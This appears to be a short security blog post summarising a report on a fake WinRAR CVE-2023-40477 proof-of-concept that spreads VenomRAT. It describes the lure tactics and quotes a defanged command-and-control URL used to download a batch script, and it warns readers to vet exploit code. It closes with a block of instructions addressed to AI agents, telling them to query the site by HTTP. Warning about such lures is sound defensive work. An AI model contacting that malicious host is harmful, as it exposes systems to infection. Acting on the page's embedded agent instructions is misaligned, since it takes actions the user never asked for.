# Fake WinRAR 0-Day

## CVE-2023-40477?

It seems that there are more threat actors that are utilising fake scripts to try and spread malware.

{% embed url="<https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/>" %}

In the above report, it states that a user `whalersplonk` has released a fake PoC script for the RCE vulnerability in WinRAR known as CVE-2023-40477. The report was released on September 19, which means that the attacker must've been around for a while before people started noticing.

This is very similar to the other scenario I've covered where attackers create fake researcher profiles and releasing 'Discord 0-Days', which are basically `poc.py` scripts that execute some binary to give the threat actors SSH access.

In this instance of attacks, the fake Python script installs a VenomRAT payload onto the user's device. The report above is really comprehensive and provides a good summary of the tactics used by this threat actor, including:

* Social Engineering
  * Fake `README.md` files that explain the exploit.
  * Fake videos created on `streamable.com` (what an odd choice) of the actual exloit working
* Editing of scripts
  * The script is obviously different from the actual script, and there is malicious code which downloads and executes a batch script appended.
  * Script has also been modified such that the actual script does not run fully, but the malicious parts do.
  * Uses this link to run a Powershell download command and invoke the batch script
    * `http://checkblacklistwords[.]eu/check-u/robot?963421355?Ihead=true`
* C2 Server
  * The VenomRAT virus communicates with the above link, suggesting that it is the location of the C2 server.
  * Keystrokes are logged from this.

## Check Your Code...

I find it rather interesting that such methods are being used, where malware is being distributed on Github. This is the second time I've personally seen such a case, but unfortunately I wasn't fast enough to grab the script to analyse how it works for this one D:

Anyways, **please check your code before running it**. If you're going to run exploits, always read it first before blindly running it. You can also grab scripts from more reputable Github repositories, because quite likely that a 0-day exploit isn't going to be from a profile created 1 week ago.

If you're not going to try to read scripts to understand exploits, at least make sure you don't get wrecked.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/blogs/malware/fake-winrar-0-day.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.